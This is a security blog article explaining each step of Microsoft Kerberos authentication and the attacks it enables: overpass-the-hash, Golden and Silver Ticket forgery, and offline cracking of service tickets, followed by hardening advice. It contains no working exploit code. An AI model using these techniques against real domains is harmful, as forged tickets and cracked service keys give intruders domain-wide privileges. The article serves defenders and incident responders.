When users are ready to authenticate to services, they request a new service ticket from the KDC.  That service ticket is unique to the target service and it includes identity information about the user, such as group membership, inside a structure called the Privilege Attribute Certificate (PAC).  The new service ticket and a new set of temporary encryption keys, called session keys, are passed to the client and then to the service.  The client and the service use the session keys to authenticate each other, as well as encrypt data between them as necessary.  Once the target service receives the service ticket, it will read the included identity information about the user and make a decision as to whether the user is authorized to use the service as requested.

That’s Kerberos in a nutshell.  Of course there are plenty of additional details, some of which we’ll get into shortly.  However, my goal is to strike a balance between providing enough information to fully describe the problems, yet not overwhelm you with unnecessary details.  For example, short-lived session keys are very important to the inner workings of Kerberos, but since they are not directly pertinent to the problems being discussed, I’m going to mostly avoid mentioning them here.  If you find yourself needing more details though, two general resources I recommend are Microsoft’s article “How the Kerberos Version 5 Authentication Protocol Works” and Mark Minasi’s recorded TechEd presentation, “Cracking Open Kerberos: Understanding How Active Directory Knows Who You Are”.

Microsoft Kerberos Step-by-Step

Now that we’ve covered the basics, let’s dig deeper and look at each step of a typical Microsoft Kerberos transaction.  Along the way, we’ll also discuss the weaknesses that provide avenues for attack.


Step 1–Authentication Service Request (AS-REQ):  The user initially authenticates to the KDC’s authentication service (AS) for a special service ticket called a ticket-granting ticket (TGT).  This most commonly occurs when the user initiates an interactive logon, though it can happen in other situations too.  This initial request encrypts the current UTC timestamp of the format YYYYMMDDHHMMSSZ with a long-term key.  In password-based environments, the long-term key is derived from the user’s password.

Multiple encryption types are normally available.  The client should choose the strongest mutually-supported encryption type, but of course an attacker can produce a downgrade attack to choose weaker encryption.  Here’s a brief summary of possible encryption types:

  • DES-CBC-CRC (disabled by default in Vista/2008)
  • DES-CBC-MD5 (disabled by default in Vista/2008)
  • RC4-HMAC (XP & 2003 default, as well as the strongest encryption they support)
  • AES128-CTS-HMAC-SHA1-96 (introduced with Vista/2008)
  • AES256-CTS-HMAC-SHA1-96 (default in Vista/2008 and higher)

When a user logs in, Windows will create a long-term key for each encryption method supported by the client OS.  Let’s take a look at the long-term keys for user ‘mike’ on a Windows 7 host that supports both the newer AES and older RC4 algorithms:



In last week’s article, we calculated user mike’s NT hash, which is simply the MD4 hash of the user’s Unicode password.  Here it is again—and notice that the hash value is the same as the RC4 long-term key:

$ echo -n Use4Passphrase,K? | iconv -t UTF-16LE | openssl md4
(stdin)= e456d67ce26e0f174ba2c92f4b677cac

As you can see, Microsoft uses the NT (NTLM) hash for Kerberos RC4 encryption.  Crazy, huh?  Why is this the case?  Apparently it was to support a more seamless upgrade from NT4 (NTLM/LM only) to Windows 2000 (the first version to support Kerberos).


The fact that an NT hash can be used to create Kerberos tickets leads to the ability to do something Benjamin Delpy, the creator of mimikatz, has termed “overpass-the-hash”.  The idea being, you can do more in Kerberos with the NT hash than you can from a standard pass-the-hash attack that utilizes NTLM.  The ability to use the NT hash to create Kerberos tickets opens up a few additional possibilities that can only be done via Kerberos, such as changing a user’s password and joining a machine to a domain.  In fact, the ability to change a password without the user’s knowledge using the NT hash caused a stir this summer following this disclosure by Aorato.  Once an attacker has changed the password, they have at least a small window of opportunity to use services like Remote Desktop and Outlook Web Access that require the password.


Step 2–Authentication Service Response (AS-REP):  Assuming the client encrypted the timestamp correctly in Step 1, and the time is within the accepted skew (5 minutes by default), then the user will have passed authentication.  The KDC then constructs a special service ticket, called the ticket-granting ticket (TGT), to be used when requesting other service tickets from the KDC’s Ticket-Granting Service (TGS).  Like all service tickets, the TGT includes identity information about the user, including username and group memberships.

Also like all service tickets, the TGT is encrypted with the target service’s long-term key.  By encrypting service tickets with the destination service’s long-term key, this protects the information in the ticket from being read or modified since only the KDC and target service know the long-term key.  In the case of the special TGT service ticket, the target service account is the built-in ‘krbtgt’ account.

An interesting feature of Kerberos is that authentication is effectively stateless.  In subsequent communications with the user, the KDC only knows that it previously authenticated this user because the TGT that the client will send in Step 3 has been encrypted with its ‘krbtgt’ account.  Once the KDC receives that encrypted TGT again, it trusts that the user must have previously authenticated and that all the included user and group information in the encrypted ticket is accurate.  This is by design so that any DC in the domain can process subsequent requests without the need to synchronize authentications across all DCs.  To a certain extent, it also does not have to spend additional cycles to look up the account information again as long as the ticket is valid (10 hours by default).  There is a caveat to this though.  Since it would be dangerous to assume for 10 hours that a user has not been deleted, disabled, or modified, the KDC will re-verify the account information if the TGT is more than 20 minutes old.

Let’s take a look at the user’s identity information embedded inside an encrypted ticket.  The following screenshot is from a Powershell Remoting (WS-MAN) session that was captured and parsed with Wireshark:


What’s being parsed here is the Privilege Attribute Certificate (PAC) information.  This has all the necessary information that allows the target service to determine if the user has the proper privileges to perform the requested action.  In this example, user ‘mike’ is just a member of Domain Users, well-known group RID 513.

It’s worth noting again that the information in the ticket, including this PAC data, was created by the KDC and encrypted with the target service’s long-term key—a key that only the KDC and the target service account know.  In order to parse these details in Wireshark, it’s necessary to provide Wireshark with the target accounts long-term Kerberos key, as shown here:


In case anyone wants to try this, what worked for me was using the Linux version of Wireshark (I could not get the PAC to parse in Windows Wireshark) and create the necessary keytab file with the Linux tool ktutil.  More details on parsing Kerberos encrypted data can be found on Wireshark’s Kerberos page and this SAMBA presentation by Ronnie Sahlberg.  (Thanks to Tim Medin for some guidance here!)


Step 3–Ticket-Granting Service Request (TGS-REQ):  Now the client would like access to a service and it needs a new service ticket to do so. The client double-checks that its TGT is still valid (not expired) and if so, it sends a request to the ticket-granting service on the KDC.  The request includes the user’s TGT and the specific service principal name that it would like to access.  Assuming the TGT is properly encrypted with the ‘krbtgt’ account’s long-term key, and the TGT is less than 20 minutes old as previously mentioned, then the KDC’s ticket-granting service will assume this is an authentic request for an authentic user whose identity details are specified in the PAC inside the ticket.  It will then continue to Step 4 to create the service ticket.

Golden Tickets

Now consider this:  What if an attacker has the long-term key for the ‘krbtgt’ account?  Well, in that case the attacker can create a TGT, put anything they want in it, and pass it to the KDC.  If it’s less than 20 minutes old, then the TGT is treated as fact—the KDC believes it describes an authenticated user with the attributes described in the PAC details.  This describes the “Golden Ticket” attack.  It’s a ticket created by an attacker with the ‘krbtgt’ key that can give any user any rights (via group membership).  In fact, it doesn’t even have to be a real user.  It can be a fictitious username with domain admin membership, or any other membership the attacker chooses to give it.  As long as the ‘krbtgt’ key is valid and the crafted TGT is less than 20 minutes old (and if it’s not, the attacker can simply create a new one), then the KDC will issue a service tickets for that user with the specified group membership.  Here’s an example of creating a Golden Ticket for non-existent user ‘bevo’ with domain admin membership via well-known group RID 512:


Assuming I supplied a valid key for the ‘krbtgt’ account, I can get a service ticket to connect to any service in the domain as a domain admin.  Furthermore, the fictitious user named ‘bevo’ is the name that would show up in the remote event logs!

The thing that makes this attack particularly devastating is that the password, and resulting keys, for the ‘krbtgt’ account almost never change.  In fact, research has shown that there is “only one circumstance where this password automatically changes.  The password for the KRBTGT account only changes when the domain functional level is upgraded from a NT5 version (2000/2003) to a NT6 version (2008/2012).  If you move from 2008 -> 2012R2 domain functional level, this hash won’t change.”

This opens up a can of worms for organizations that have previously had their domain compromised and credentials dumped from a domain controller.  Or perhaps had the Active Directory data get out of their control via an old backup, or DC VM archive, or even an attack they are unaware of.

The takeaway is that if you are responding to a potential domain compromise and see unusual activity, perhaps even from non-existent users, then the Golden Ticket could possibly be in play.  Furthermore, if you’re in a situation where you need to reset the ‘krbtgt’ account for recovery, be sure to change it twice, as described here and here.   Probably the better course of action is to leave the old domain for dead and move to a new pristine domain/forest, but unfortunately that’s not always feasible.


Step 4–Ticket-Granting Service Response (TGS-REP):  Once the TGS examines and verifies the TGT, it creates the requested service ticket. The client’s identity from the TGT is copied into a PAC in the new service ticket.  Then the new service ticket is sent to the client, who will then pass it on to the target service.

The new service ticket is encrypted with the target service account’s long-term key and the embedded PAC is signed by the ‘krbtgt’ account for verification in optional Step 6.  In most cases, the target service account is the computer account for the remote service.  This is true for common services such as CIFS, RPC, Scheduler, WS-MAN, and many more.  However, the target service account could be a dedicated domain user account used to run the service.

It’s interesting to note that the KDC cannot determine if the user will be able to get access to the target service.  It simply returns a valid ticket.  Authentication does not imply authorization.  Authorization is determined by the target service based on the user and group information in the PAC.


There is no obstacle to requesting service tickets other than having a valid TGT.  A user can request service tickets to any service in the domain.  Again, the KDC doesn’t know if the user is authorized for the service—that’s up to the service to decide—so it happily issues tickets for any valid request it receives.  For a large domain, there could be thousands, perhaps even millions of services, as each host typically has a few SPNs.  Check for yourself with the command “setspn –l <account-name>”.  The <account name> should be either a computer name or dedicated user account for hosting services.

Why would this be of interest?  Since the service ticket is encrypted with the service account’s long-term key, an attacker can gather service tickets and attempt a brute-force attack on the long-term key that was used to encrypt the ticket.  If the key can be derived, then there’s potential to elevate privileges via the “Silver Ticket” attack (more on Silver Tickets in Step 5).  The attacker could also take the cracked key and connect to other hosts on the network if the service account has sufficient rights.

By the way, when discussing Kerberos cracking via MITM, I use the terms password and key almost interchangeable.  This is because the most efficient way to crack the key that created the Kerberos ticket is to start with a dictionary attack against the password that created the Kerberos encryption key.  So yes, the MITM attack is cracking the key, but it typically involves first guessing the password that created that key.

For most service accounts, brute-force cracking the password and resulting key is very difficult because they belong to the built-in computer account.  The password for computer accounts is very complex and highly unlikely to be cracked, regardless of RC4 or AES encryption.  However for some services, the service does not use the built-in computer account to run the service, but instead uses a dedicated domain user account.  Tim Medin has done a lot of research in this area and has found that MS-SQL services are particularly vulnerable to attack because they are typically configured with a domain account rather than a computer account.  Furthermore, many blogs suggest that the quick way to get the job done is to give the MS-SQL service account domain admin rights.  Yikes!

Whether given domain admin rights or not, what is the chance that this dedicated MS-SQL account, or any other domain service account, was given a strong password?  Probably a good chance in some environments and a poor chance in others.  If the password is poor, then the password and resulting Kerberos key can be cracked–period.  It can be cracked faster if the encryption type is RC4 rather than AES since the Kerberos AES function requires much more computational efffort to generate a guess than RC4.  Therefore, along with the “overpass-the-hash” issue described in Step 1, MITM vulnerabilities provide another incentive to decommission RC4 encryption in favor of AES.

Definitely check out the work by Tim Medin on this issue.  He did a great presentation at DerbyCon where he goes through this in great detail.  He also debuts his toolset called Kerberoast, which among other things, provides a tool to crack the Kerberos TGS-REP responses.  He also shows how the discovered password/long-term key can be used to create a Silver Ticket, which I’ll describe in the next step.


Step 5–Application Server Request (AP-REQ):  Once the user receives the service ticket, it’s ready to forward on to the target service. The service will decrypt the ticket with the service account’s long-term key.  After it decrypts the ticket, it will check the user’s information within the PAC.  Based on the account information, the service decides whether or not to authorize the user to perform the requested action.

At this point, the service could proceed to optional Step 6 to validate the PAC information with the KDC.  Only the KDC can validate the PAC because the validation occurs via a signature with the ‘krbtgt’ account.  Ideally this validation would happen to verify that user information is accurate, but it rarely does due to the performance impact.  The validation exceptions are discussed in a number of places, such as the Technet article “Understanding Microsoft Kerberos PAC Validation” and the previously mentioned 20-minute rule article.  In a nutshell, as Tim put it in his DerbyCon presentation, “Basically, if it runs as a service, it will not verify”.  My own testing backs this up.  I’ve yet to find a way to get services that “Act as part of the operating system” (of which most do) to validate, even with the ValidateKdcPacSignature value is set to 1 in the registry as described in the above Technet article.

Silver Tickets

So is it problem if the service doesn’t verify the PAC information?  Yes, it is a problem if the service account’s long-term key can be discovered (for example, via the MITM attack discussed with Step 4).  If an attacker discovers the long-term key, a service ticket can be crafted that the service will decrypt and trust as long as it doesn’t verify the PAC with the KDC.  What if an attacker creates a service ticket that says the connecting client is a member of the domain admins group?  If the ticket is encrypted with the service’s long-term key, and the service doesn’t verify the PAC data, then it assumes it to be true and will grant access to the connecting user as though they were a domain admin.  This is the “Silver Ticket”.

Why doesn’t Microsoft always verify?  For performance reasons.  From the Technet article referenced above, “Performing PAC validation implies a cost in terms of response time and bandwidth usage. It requires bandwidth usage to transmit requests and responses between an application server and the DC. This may cause some performance issues in high volume application servers (KB906736). In such environments, user authentication may induce additional network delay and traffic for carrying PAC validation messages between the server and the DC.”


Step 6—Verify Service Ticket PAC (Optional) (VERIFY-PAC):  As just discussed, the service has the option to send the PAC information to the KDC to verify the ‘krbtgt’ account’s signature.  This ensures the KDC created the service ticket.  This can be enforced, but it rarely is for performance reasons.


Step 7–Application Server Response (Optional) (AP-REP):  Optionally, the user might have requested in Step 5 that the target service verify its identity for mutual authentication. If so, the service encrypts a timestamp with the session key that only the user and service should know and sends it back to the user for verification.


I’m going to mention just a few things here, and also refer you to a great resource with many more suggestions for hardening your Windows environment.  The paper “Mitigating Service Account Credential Theft on Windows” by HD Moore, Joe Bialek, and Ashwath Murthy provides a very good discussion of the problems we face with privileged accounts, along with a significant list of recommendations beginning on page 8 of the 13 page paper.

Of the Kerberos issues discussed here, the Golden Ticket issue is the most concerning.  Of course it’s concerning if you know your domain controller was compromised and AD credentials were dumped.  Unless the ‘krbtgt’ account was reset twice, then consider that domain to still be compromised.  Furthermore, it’s also concerning if you don’t know if your domain controller was compromised.  What if there are indications of compromise, but no solid proof?  What if there aren’t even any indications?  Does that mean it hasn’t happened and that it’s okay to keep this almighty ‘krbtgt’ password unchanged for years and years?  That goes against one of our primary security principles—the idea that we should refresh passwords regularly in order to avoid exposure from stolen credentials.  I hope Microsoft addresses this by forcing a password rotation scheme for the ‘krbtgt’ account.  In theory it should not be a problem.  The reason you have to change this account’s password twice to invalidate the current password is because there is a built-in fault tolerance to allow for the previous password to still work.  So it should be possible to frequently rotate in new passwords/keys.  At least that way a compromise (known or unknown) does not last effectively for years.

Regarding the Silver Ticket issue, always enforcing PAC validation doesn’t currently appear to be a feasible solution.  Therefore, the best bet here is to do something you’d want to do anyway—enforce very strong passwords for your service accounts to mitigate the MITM attack.  Probably the best ways to do that is to use Microsoft’s Managed Service Account feature, which among other things rotates strong passwords every 30 days for designated service accounts.

Lastly, to help address both the MITM and “overpass-the-hash” issue, disable the older RC4 encryption method if possible.  This makes brute-force MITM attacks more time consuming and prevents the NT hash from being used to create Kerberos tickets.  From a Windows perspective, this can be done via Group Policy after all XP and 2003 systems have been decommissioned.


Mike Pilkington is a Sr. Information Security Consultant and Incident Responder for a Fortune 500 company in Houston, TX, as well as a SANS instructor teaching  FOR408  and  FOR508.  Find Mike on Twitter @mikepilkington.